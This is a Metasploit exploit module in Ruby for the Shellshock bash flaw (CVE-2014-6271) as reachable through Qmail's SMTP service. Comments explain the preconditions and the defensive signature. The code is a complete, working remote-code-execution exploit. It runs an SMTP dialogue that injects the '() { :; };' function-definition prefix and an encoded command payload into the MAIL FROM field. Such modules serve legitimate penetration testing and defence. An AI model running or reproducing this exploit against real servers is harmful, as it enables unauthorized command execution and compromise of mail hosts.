Path: blob/master/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit exploit module for CVE-2014-6271 ("Shellshock") as reachable
# through Qmail's SMTP front end.
#
# The module drives a minimal SMTP conversation over the framework's
# Msf::Exploit::Remote::Smtp mixin (`connect`, `sock`, `disconnect`,
# `datastore`) and places a bash function definition followed by the
# command payload inside the MAIL FROM address. The module description
# below records the preconditions the authors name: a vulnerable bash,
# /bin/sh resolving to bash, and a valid RCPT TO recipient.
#
# From a defensive point of view the observable artefact is an SMTP
# MAIL FROM value beginning with the `() { :; };` function-definition
# prefix; patching bash (or not pointing /bin/sh at bash, as the
# description notes) removes the condition this module relies on.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Smtp

  # Registers module metadata with the framework and removes the
  # MAILFROM option, since this module constructs the MAIL FROM field
  # itself in #exploit.
  #
  # @param info [Hash] metadata passed in by the framework loader
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
      'Description'    => %q{
        This module exploits a shellshock vulnerability on Qmail, a public
        domain MTA written in C that runs on Unix systems.
        Due to the lack of validation on the MAIL FROM field, it is possible to
        execute shell code on a system with a vulnerable BASH (Shellshock).
        This flaw works on the latest Qmail versions (qmail-1.03 and
        netqmail-1.06).
        However, in order to execute code, /bin/sh has to be linked to bash
        (usually default configuration) and a valid recipient must be set on the
        RCPT TO field (usually [email protected]).
        The exploit does not work on the "qmailrocks" community version
        as it ensures the MAILFROM field is well-formed.
      },
      'Author' =>
        [
          'Mario Ledo (Metasploit module)',
          'Gabriel Follon (Metasploit module)',
          'Kyle George (Vulnerability discovery)'
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'References'     =>
        [
          ['CVE', '2014-6271'],
          ['CWE', '94'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'https://seclists.org/oss-sec/2014/q3/649'],
          ['URL', 'https://lists.gt.net/qmail/users/138578']
        ],
      'Payload' =>
        {
          # 0x3e is '>', which would close the angle-bracketed address
          # that #exploit wraps the payload in.
          'BadChars' => "\x3e",
          'Space' => 888,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic telnet perl ruby python'
              # The telnet, ruby, python and perl variants work only if
              # the corresponding interpreter is installed on the target.
            }
        },
      'Targets' => [ [ 'Automatic', { }] ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2014-09-24'
    ))

    # The MAIL FROM field is built by #exploit, so the mixin's option
    # would be misleading to the operator.
    deregister_options('MAILFROM')
  end

  # Writes one raw SMTP command to the connected socket and reads a
  # single reply.
  #
  # @param data [String, nil] the raw bytes to send; nil is interpolated
  #   to an empty string
  # @return [Array(String, Integer)] the reply text (chomped) and the
  #   numeric code parsed from its first three characters; the code is
  #   0 when no reply was read or a connection-level error occurred,
  #   and the text is nil when an unexpected exception was rescued
  def smtp_send(data = nil)
    begin
      result = ''
      code = 0
      sock.put("#{data}")
      result = sock.get_once
      # get_once may yield nil; only strip and parse a real reply.
      result.chomp! if (result)
      # SMTP replies start with a three-digit status code.
      code = result[0..2].to_i if result
      return result, code
    rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
      # Connection-level failures are reported to the caller as code 0
      # so #exploit can print a generic 'connection error'.
      return result, 0
    rescue ::Exception => e
      # NOTE(review): rescuing ::Exception also catches Interrupt and
      # SystemExit; StandardError would be the narrower choice.
      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
      return nil, 0
    end
  end

  # Runs the SMTP dialogue: HELO, MAIL FROM carrying the encoded payload,
  # RCPT TO from the MAILTO option, DATA, then a minimal message body.
  #
  # After each step the reply code is checked; anything outside the
  # accepted range aborts via fail_with. A code of 0 (see #smtp_send)
  # is reported as 'connection error', otherwise the server's reply
  # text is used as the failure message.
  def exploit
    to = datastore['MAILTO']
    connect
    result = smtp_send("HELO localhost\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    print_status('Sending the payload...')
    # Backslashes in the encoded payload are doubled before it is placed
    # inside the bracketed address.
    result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    print_status("Sending RCPT TO #{to}")
    result = smtp_send("rcpt to:<#{to}>\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    result = smtp_send("data\r\n")
    # DATA is normally answered with 354, hence the wider upper bound here.
    if result[1] < 200 || result[1] > 354
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    disconnect
  end
end